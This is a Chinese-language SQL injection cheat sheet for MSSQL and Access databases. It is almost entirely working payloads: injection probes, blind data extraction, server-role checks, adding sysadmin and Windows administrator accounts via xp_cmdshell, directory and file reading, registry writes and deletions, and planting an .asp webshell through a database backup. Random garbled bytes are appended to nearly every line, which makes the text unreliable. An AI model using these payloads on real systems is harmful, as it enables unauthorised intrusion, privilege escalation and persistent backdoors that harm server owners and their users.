1.判断是否有注入;and 1=1 ;and 1=2 ��}Ecv6�&G
2.初步判断是否是mssql ;and user>0 pZS]i�
�"�
^|Z�'}p�|&
3.注入参数是字符'and [查询条件] and ''=' a&J����Y x
�3�}\��z&|
4.搜索时没过滤参数的'and [查询条件] and '%25'=' /�g>-�s&�w
y%vAEQ2j=�
5.判断数据库系统 q�`p0ul,�n
)]��q Qgc&
;and (select count(*) from sysobjects)>0 mssql @@*x�/"GJG
`W�H$rx!��
;and (select count(*) from msysobjects)>0 access n`Z}tQ%)�o
�i�e�d�1+H
>g !Z|j�u�
��H_�f8/�H
6.猜数据库 ;and (select Count(*) from [数据库名])>0 ?S��&
y��F
z&H.f�s��L
7.猜字段 ;and (select Count(字段名) from 数据库名)>0 %� WDT�nEm
��.i�R<5.
8.猜字段中记录长度 ;and (select top 1 len(字段名) from 数据库名)>0 j>8ub��A��
�*e� ��[�*
9.(1)猜字段的ascii值(access) (��km�
$qX
�@cIYS%�iZ
;and (select top 1 asc(mid(字段名,1,1)) from 数据库名)>0 NB<8�M!X/
�?<4pYE��P
(2)猜字段的ascii值(mssql) b� * \�
oQ
U<�&��=pv�
;and (select top 1 unicode(substring(字段名,1,1)) from 数据库名)>0 ]a/d��v�j}
4�RDY_HgF6
10.测试权限结构(mssql) *-�=/"�m�
&Y1h=,KR9�
f�4pIF"U9>
%pjY�^tM/�
;and 1=(select IS_SRVROLEMEMBER('sysadmin'));-- @�,o�c%��m
��3q`f|�r�
;and 1=(select IS_SRVROLEMEMBER('serveradmin'));-- MD$W;rk(Hn
mRAt5a�#is
;and 1=(select IS_SRVROLEMEMBER('setupadmin'));-- sT1k]du��T
;R0L�JApey
;and 1=(select IS_SRVROLEMEMBER('securityadmin'));-- B Z�U@W%E�
+)yo�QRekX
;and 1=(select IS_SRVROLEMEMBER('diskadmin'));-- [nHN@�p|��
��v\bWQs1�
;and 1=(select IS_SRVROLEMEMBER('bulkadmin'));-- axmq�/�8X�
[?N��,�3��
;and 1=(select IS_MEMBER('db_owner'));-- 8��!35�
K
j)8$hK/e0.
+mBS�&�F�K
�to).��PI?
11.添加mssql和系统的帐户 �r&xIVFPI[
H2|�'JA#�v
;exec master.dbo.sp_addlogin username;-- �x7��e0&��
;exec master.dbo.sp_password null,username,password;-- .*6��Nq�X$
�'eBD/w5�U
;exec master.dbo.sp_addsrvrolemember sysadmin username;-- �~roNe|P�
e=h-��}XRC
;exec master.dbo.xp_cmdshell 'net user username password 5�D<Zbn.>q
-cU���bIbW
/workstations:*/times:all/passwordchg:yes /passwordreq:yes /active:yes /add';-- +fY��@q�,`
Kh4rl)L*+%
;exec master.dbo.xp_cmdshell 'net user username password /add';-- #@�-dT��,t
;Eg��l8Vhr
;exec master.dbo.xp_cmdshell 'net localgroup administrators username /add';-- ��6I(Y<LZ5
�K�W'n��W�
,5<AV K-#Q
�`vz�MuL�;
12.(1)遍历目录 x(�sKkm`�Q
!otseI!!/�
;create table dirs(paths varchar(100), id int) >�a*�dI_XE
M*n94L=Sg&
;insert dirs exec master.dbo.xp_dirtree 'c:\' o�M�AU�R
"
6@l��ZVM)E
;and (select top 1 paths from dirs)>0 GK�E��OjaE
z l`m1k�-X
;and (select top 1 paths from dirs where paths not in('上步得到的paths'))>) ,#B��D/dF�
sK�W~+���]
T]Q4�=�xsv
�tkm@&e=e%
(2)遍历目录 shdz�kET8N
�W�Y�RC_U7
;create table temp(id nvarchar(255),num1 nvarchar(255),num2 nvarchar(255),num3 nvarchar(255));-- ��Q�sKnaRT
;insert temp exec master.dbo.xp_availablemedia;-- 获得当前所有驱动器 {~�]5QK�g.
FT>>X�P��8
;insert into temp(id) exec master.dbo.xp_subdirs 'c:\';-- 获得子目录列表 3d;J"e+?��
�-�wH0g^Ed
;insert into temp(id,num1) exec master.dbo.xp_dirtree 'c:\';-- 获得所有子目录的目录树构 R#Yj��%$E1
61QA�<W��b
;insert into temp(id) exec master.dbo.xp_cmdshell 'type c:\web\index.asp';-- 查看文件的内容 �A#']e���8
7�)�}_'�p
j*gZvbO;'L
%I`'it�2�d
13.mssql中的存储过程 m�["�e7>9G
�;uc�3_J�]
xp_regenumvalues 注册表根键, 子键 ��@�$kzes\
a5m[
N'kah
;exec xp_regenumvalues 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Run' 以多个记录集方式返回所有键值 ?{ \7t�h37
�id+EBVHAd
xp_regread 根键,子键,键值名 :I�/9j=�@1
\kKd:�C{��
;exec xp_regread wbr$w�>�n�
3%Q<K=�j�y
'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','CommonFilesDir' 返回制定键的值 6&�<Q�j�O�
Ok)f5")N %
xp_regwrite 根键,子键, 值名, 值类型, 值 z@�Z�I$.w�
J"h�2"$v,�
值类型有2种REG_SZ 表示字符型,REG_DWORD 表示整型 �7g�Ou|�t�
pk�'d&�.��
;exec xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName','reg_sz','hello' 写入注册表 uj\�&-9gEi
IC"ktv bHz
xp_regdeletevalue 根键,子键,值名 2h<_?GM\s�
I�w?f�1��]
exec xp_regdeletevalue 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName' 删除某个值 A>Qu`�%�g*
v1+��.-hO�
xp_regdeletekey 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Testkey' 删除键,包括该键下所有值 �h8��M_Uk
9
4��bDJy1
�"fv��+}'�
��mHW%^R=�
14.mssql的backup创建webshell x��]hG2on!
0n4(�Rj|}2
use model qmPu D/��c
)gU:Up24|"
create table cmd(str image); �
)bYOy+2g
�_��qOynW
insert into cmd(str) values (''); �H/ e�jO_{
}�jce�5��E
backup database model to disk='c:\l.asp'; ^wSGrV��'�
-/B*�\X�[�
&)Zv�>P8z`
6^jr�v [d�
15.mssql内置函数 ;�D�-�k\kv
Omn����$O>
;and (select @@version)>0 获得Windows的版本号 ~#so4<�A`3
#~m^R���oE
;and user_name()='dbo' 判断当前系统的连接用户是不是sa Exv!!0Cd^�
iu�{��;|�E
;and (select user_name())>0 爆当前系统的连接用户 VR_/Vh��]@
i&m�6;>?�`
;and (select db_name())>0 得到当前连接的数据库 !��.iFU+?V
#68$'Rl"o1
bM_fuy55Op
�@�@R&�OR�
16.简洁的webshell &\5�bo=5V�
ett�Bq�ue�
use model vd^Z^cpi�p
X�g��USJ�*
create table cmd(str image); {Z�!t:'x�8
1)~9�Eku6K
insert into cmd(str) values (''); �.M�DSP/s
.�*59�5SuF
backup database model to disk='g:\wwwtest\l.asp';
